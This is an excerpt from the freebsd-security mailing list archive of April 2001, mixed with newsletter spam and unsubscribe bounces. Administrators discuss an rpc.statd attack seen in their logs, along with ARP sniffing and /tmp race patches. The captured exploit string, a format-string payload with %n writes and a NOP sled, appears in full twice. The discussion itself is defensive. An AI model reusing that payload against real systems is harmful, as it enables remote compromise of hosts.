Apr 20 23:09:05 z rpc.statd: invalid hostname to sm_stat: ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P

I guess it's the old linux rpc.statd exploit. But how can I see what IP did this? Does rpc.statd log this information by default?
/Pär

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 20 14:19:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id C856A37B509 for ; Fri, 20 Apr 2001 14:18:59 -0700 (PDT) (envelope-from bounce-fwd-newswire-2059532@nova.sparklist.com) X-Mailer: Lyris Web Interface Date: Fri, 20 Apr 2001 15:21:53 -0500 Subject: FirewireDirect Gets A New Spark Mime-Version: 1.0 To: "FirewireDirect.com"
From: "FirewireDirect NewsWire" Content-Type: multipart/alternative; boundary="============newsletter============" List-Unsubscribe: Reply-To: "FirewireDirect.com" X-Hosted-By: http://SparkLIST.com/ - The Business Email List Experts Message-Id: <20010420211859.C856A37B509@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

--============newsletter============
Content-Type: text/plain; charset="iso-8859-1" ; format="flowed"
Content-Transfer-Encoding: quoted-printable

FirewireDirect is happy to announce the debut and immediate availability of the newest in our series of FireWire storage solutions, the 2.5" Spark II FireWire & USB Portable Hard Drive.

The new design means we've retired the number of the original Spark, the popular mobile hard drive that launched our line of FireWire solutions. We've replaced it with an even smaller chassis, and added USB for extra flexibility.

Come by our web site to see the new package, and order this weekend to receive FREE SHIPPING.

Spark II 10GB HDD - $259
Spark II 20GB HDD - $329
Spark II Firewire Enclosure Kit - $119

This offer ends Tuesday, April 24, 200. This is a special offer to subscribers to this list. Please see our web site for info about these offers.

---
You are currently subscribed to fwd-newswire as: freebsd-security@freebsd.org
To unsubscribe send a blank email to leave-fwd-newswire-2059532E@nova.sparklist.com
or visit our subscription page at http://firewiredirect.com/company/newswire/subscribe.shtml

--============newsletter============
Content-Type: text/html; charset="iso-8859-1" ;
Content-Transfer-Encoding: 8bit
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 14:23:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 9E93637B423 for ; Fri, 20 Apr 2001 14:23:14 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 16:25:16 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 16:25:16 -0500 From: freebsd-security@freebsd.org () To: fwd-newswire-request Subject: # Mail sent to leave-fwd-newswire was converted to these commands: unsubscribe end # This is the text of the message that triggered the action: Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 16:25:16 -0500 From: freebsd-security@freebsd.org () To: leave-fwd-newswire@nova.sparklist.com Subject: your subscription request IP:24.113.38.176 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 14:23:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 8C83737B422 for ; Fri, 20 Apr 2001 14:23:48 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: 
freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 16:25:51 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from mail.integratus.com ([63.209.2.83]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 16:25:51 -0500 Received: (qmail 18228 invoked from network); 20 Apr 2001 21:23:41 -0000 Received: from kungfu.integratus.com (HELO integratus.com) (172.20.5.168) by tortuga1.integratus.com with SMTP; 20 Apr 2001 21:23:41 -0000 Sender: jar Message-ID: <3AE0A8DD.EF998C51@integratus.com> Date: Fri, 20 Apr 2001 14:23:41 -0700 From: Jack Rusher Organization: http://www.integratus.com/ X-Mailer: Mozilla 4.73 [en] (X11; I; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: fwd-newswire-request Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit subject: # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from mail.integratus.com ([63.209.2.83]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 16:25:51 -0500 Received: (qmail 18228 invoked from network); 20 Apr 2001 21:23:41 -0000 Received: from kungfu.integratus.com (HELO integratus.com) (172.20.5.168) by tortuga1.integratus.com with SMTP; 20 Apr 2001 21:23:41 -0000 Sender: jar Message-ID: <3AE0A8DD.EF998C51@integratus.com> Date: Fri, 20 Apr 2001 14:23:41 -0700 From: Jack Rusher Organization: http://www.integratus.com/ X-Mailer: Mozilla 4.73 [en] (X11; I; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: leave-fwd-newswire-2059532E@nova.sparklist.com Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit -- Jack Rusher, Senior Engineer | 
mailto:jar@integratus.com Integratus, Inc. | http://www.integratus.com

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 20 14:31:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.fdma.com (mail.fdma.com [216.241.67.73]) by hub.freebsd.org (Postfix) with ESMTP id 4596937B43C for ; Fri, 20 Apr 2001 14:31:10 -0700 (PDT) (envelope-from scheidell@fdma.com) Received: from MIKELT (mikelt.fdma.lan [192.168.3.5]) by mail.fdma.com (8.11.3/8.11.3) with SMTP id f3KLUpg57538 for ; Fri, 20 Apr 2001 17:30:52 -0400 (EDT) Message-ID: <004e01c0c9e1$2cb1d390$0503a8c0@fdma.com> From: "Michael Scheidell" To: References: Subject: Re: rpc.statd attack Date: Fri, 20 Apr 2001 17:30:50 -0400 Organization: Florida Datamation, Inc. MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

"Pär Thoren" wrote in message news:Pine.GSO.4.21.0104202315040.27489-100000@helios...
>
> Ok when I get portscanned...but these guys try to exploit my ass.

Set up ipfw for next round.

I suspect that there is a 'probe' for port 111; every day this happens 3 or 4 times a day on every system I monitor. If you want to log them, and automatically have them reported, see www.mynetwatchman.com: there is a perl agent available that will autoupload denies from ipfw logs (cisco logs, sonicwall logs, and bonus: version.bind queries are logged at udp port 53 attacks for you as well).

The freebsd files are not in a ports package (yet) but if someone wants to do it, I have the perl scripts and rc.d/sh startup file available.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 20 14:37:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from mooseriver.com (erie.mooseriver.com [205.166.121.26]) by hub.freebsd.org (Postfix) with ESMTP id 03E9C37B424 for ; Fri, 20 Apr 2001 14:37:42 -0700 (PDT) (envelope-from jgrosch@mooseriver.com) Received: (from jgrosch@localhost) by mooseriver.com (8.11.2/8.11.2) id f3KLbZS79931; Fri, 20 Apr 2001 14:37:35 -0700 (PDT) (envelope-from jgrosch) Date: Fri, 20 Apr 2001 14:37:35 -0700 From: Josef Grosch To: =?iso-8859-1?Q?P=E4r_Thoren?= Cc: freebsd-security@FreeBSD.ORG Subject: Re: rpc.statd attack Message-ID: <20010420143734.A79887@mooseriver.com> Reply-To: jgrosch@mooseriver.com References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 1.0.1i In-Reply-To: ; from t98pth@student.bth.se on Fri, Apr 20, 2001 at 11:17:55PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, Apr 20, 2001 at 11:17:55PM +0200, Pär Thoren wrote:
>
> Ok when I get portscanned...but these guys try to exploit my ass.
>
> Apr 20 23:09:05 z rpc.statd: invalid hostname to
> sm_stat: ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
>
> I guess it's the old linux rpc.statd exploit. But how can I see what IP
> did this? Does rpc.statd log this information by default?
>
> /Pär

Ya, I saw a couple of these in my log files last night. I also would like to find out what the IP of these bozos is. I'd like to let their ISP know that these guys need to be spanked pretty hard.

One should check to see if rpc.statd is turned off in /etc/inetd.conf.
Josef

--
Josef Grosch           | Another day closer to a | FreeBSD 4.3
jgrosch@MooseRiver.com | Micro$oft free world    | www.bafug.org

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 20 15:11:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 38B6537B43F for ; Fri, 20 Apr 2001 15:11:28 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 17:13:31 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:13:31 -0500 From: freebsd-security@freebsd.org (freebsd-security) To: fwd-newswire-request Subject: # Mail sent to leave-fwd-newswire was converted to these commands: unsubscribe end # This is the text of the message that triggered the action: Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:13:31 -0500 From: freebsd-security@freebsd.org (freebsd-security) To: leave-fwd-newswire@nova.sparklist.com Subject: your subscription request IP:131.225.121.207 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 15:13:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 50F0337B42C for ; Fri, 20 Apr 2001 15:13:08 -0700 (PDT)
(envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 17:15:11 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:15:11 -0500 From: freebsd-security@freebsd.org (Freebsd Security) To: fwd-newswire-request Subject: # Mail sent to leave-fwd-newswire was converted to these commands: unsubscribe end # This is the text of the message that triggered the action: Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:15:11 -0500 From: freebsd-security@freebsd.org (Freebsd Security) To: leave-fwd-newswire@nova.sparklist.com Subject: your subscription request IP:216.78.192.125 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 15:51:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 5583037B43C for ; Fri, 20 Apr 2001 15:51:41 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 17:53:43 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. 
--- Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:53:43 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3KMtpI10729 for ; Fri, 20 Apr 2001 17:55:51 -0500 Message-Id: <4.3.1.2.20010420174802.02e4a2f0@207.67.22.123> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Fri, 20 Apr 2001 17:48:06 -0500 To: fwd-newswire-request From: admin Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 17:53:43 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3KMtpI10729 for ; Fri, 20 Apr 2001 17:55:51 -0500 Message-Id: <4.3.1.2.20010420174802.02e4a2f0@207.67.22.123> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Fri, 20 Apr 2001 17:48:06 -0500 To: leave-fwd-newswire-2059532E@nova.sparklist.com From: admin Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 16: 1:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 1491337B43C for ; Fri, 20 Apr 2001 16:01:54 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: 
X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 18:03:36 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 18:03:36 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3KN5jI12517 for ; Fri, 20 Apr 2001 18:05:45 -0500 Message-Id: <4.3.1.2.20010420175757.00d1f610@207.67.22.123> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Fri, 20 Apr 2001 17:58:01 -0500 To: fwd-newswire-request From: "SparkLIST.com Abuse" Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 18:03:36 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3KN5jI12517 for ; Fri, 20 Apr 2001 18:05:45 -0500 Message-Id: <4.3.1.2.20010420175757.00d1f610@207.67.22.123> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Fri, 20 Apr 2001 17:58:01 -0500 To: leave-fwd-newswire-2059532E@nova.sparklist.com From: "SparkLIST.com Abuse" Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From 
owner-freebsd-security Fri Apr 20 19: 2: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from ct980320-b.blmngtn1.in.home.com (ct980320-b.blmngtn1.in.home.com [65.8.207.32]) by hub.freebsd.org (Postfix) with ESMTP id 8BCF837B423 for ; Fri, 20 Apr 2001 19:02:03 -0700 (PDT) (envelope-from mikes@ct980320-b.blmngtn1.in.home.com) Received: (from mikes@localhost) by ct980320-b.blmngtn1.in.home.com (8.11.3/8.11.3) id f3L21xf14241; Fri, 20 Apr 2001 21:01:59 -0500 (EST) (envelope-from mikes) From: Mike Squires Message-Id: <200104210201.f3L21xf14241@ct980320-b.blmngtn1.in.home.com> Subject: Re: rpc.statd attack In-Reply-To: <20010420143734.A79887@mooseriver.com> "from Josef Grosch at Apr 20, 2001 02:37:35 pm" To: jgrosch@mooseriver.com Date: Fri, 20 Apr 2001 21:01:59 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL88 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I saw a couple of these in my log files last night. I also would like to > find out what the IP of these bozos is. I'd like to let their ISP know that > these guys need to be spank pretty hard. I get them all the time; I assume they are varients of the Ramen attack. I use snort 1.7 to track the alleged incoming IP numbers; a few ISP's have reported back to me that in fact they found hacked LINUX boxes at the indicated address. (snort 1.7 from ports, plus snortsnarf from www.snort.org to put the logs into a quickly readable format). 
MLS

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 21 0:13:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 1E37737B422 for ; Sat, 21 Apr 2001 00:13:16 -0700 (PDT) (envelope-from geniusj@bluenugget.net)
Received: from skinflutei32jg (windows.box [64.3.150.191]) by bluenugget.net (Postfix) with ESMTP id 504B213602 for ; Sat, 21 Apr 2001 00:16:12 -0700 (PDT)
Message-ID: <000701c0ca33$5d05fbf0$bf960340@skinflutei32jg>
From: "Jason DiCioccio"
To:
Subject: Fw: Linux patches to solve /tmp race problem
Date: Sat, 21 Apr 2001 00:19:11 -0700
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This looks pretty neat.. kind of strange, but neat none the less :-).. Any
comments on whether it should go to the wishlist or straight to the trash? :)
(I think it would be a nice sysctl tweak myself)

> From: matthew@DATADELIVERANCE.COM
> Hi all,
>
> I have recently developed some patches to the Linux 2.2 kernels which solve
> the /tmp race problem without needing to define environment variables -
> useful particularly for naive applications and scripts which don't use
> TMPDIR and friends.
>
> The patch creates "dynamic" symlinks, which point to different paths
> depending on the user accessing them (for example, including the UID in the
> path name). Such a link can be placed instead of /tmp and/or /var/tmp, and
> any other similar directories. More usefully, these links can be configured
> to automatically create the directory they refer to if it does not exist.
>
> This means you can create a directory such as /tmp_files, for example, and
> have the /tmp link automatically create user directories in it on demand.
> Default permissions and ownership can be specified.
>
> The patches are available from http://www.datadeliverance.com in the Linux
> Patches section, along with a full discussion of the issues involved. Your
> comments on the scheme are invited.
>
> Cheers
>
> -Matthew
>
> --
> +--------------------------------------------------------------------------+
> | Matthew Donaldson            http://www.datadeliverance.com              |
> | Data Deliverance Pty. Ltd.   Email: matthew@datadeliverance.com          |
> | 30 Musgrave Ave.             Phone: +61 8 8265 7976            _         |
> | Banksia Park                 Fax:   +61 8 8265 0032   John    / \/       |
> | South Australia 5091                                  3:16    \_/\       |
> +--------------------------------------------------------------------------+
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 21 1:53:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 9BBAF37B422 for ; Sat, 21 Apr 2001 01:53:21 -0700 (PDT) (envelope-from poige@morning.ru)
Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id QAA16889 for ; Sat, 21 Apr 2001 16:55:50 +0800 (KRAST) (envelope-from poige@morning.ru)
Date: Sat, 21 Apr 2001 16:56:20 +0700
From: Igor Podlesny
X-Mailer: The Bat!
(v1.52 Beta/7) UNREG / CD5BF9353B3B7091
Reply-To: Igor Podlesny
Organization: Morning Network
X-Priority: 3 (Normal)
Message-ID: <1972094846.20010421165620@morning.ru>
To: freebsd-security@FreeBSD.ORG
Subject: Re[2]: static arp values
X-Sender: Igor Podlesny
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

PT> On Fri, 20 Apr 2001, Joseph Gleason wrote:

>> When you do arp -a, is the static entry you set marked as permanent?

PT> yes it is

>>
>> Did you simulate another box taking that IP and look at the arp table
>> afterward?
>>

PT> Yes I did. And the arp is in fact what it is supposed to be. So it appears
PT> static. (when i did the same thing on w2k, arp -s, the mac address
PT> changed).

PT> But I can still sniff the connection between the machine with the static
PT> arp value and the router. That is what I find strange.

hm. it seems you need to know how ETHERNET networks work. No matter whether
a box knows the MAC addr of the other box or asks the network for it. At
last, they will talk to each other over SHARED media, which ETHERNET
certainly is. You may use `Switches' to avoid such a situation; some of them
can even be configured to bind their ports to respective MAC addrs, but some
cards can be MAC changeable, as "Joseph Gleason" mentioned before...

In short, all these gotchas are drawbacks of Ethernet technology. If you use
it, the only way to be 99% protected is using VPN technology over it.

good luck!

PT> I simulate the man-in-the-middle attack with ettercap by the way.

>> Also, you should be aware that some cards allow you to change the MAC
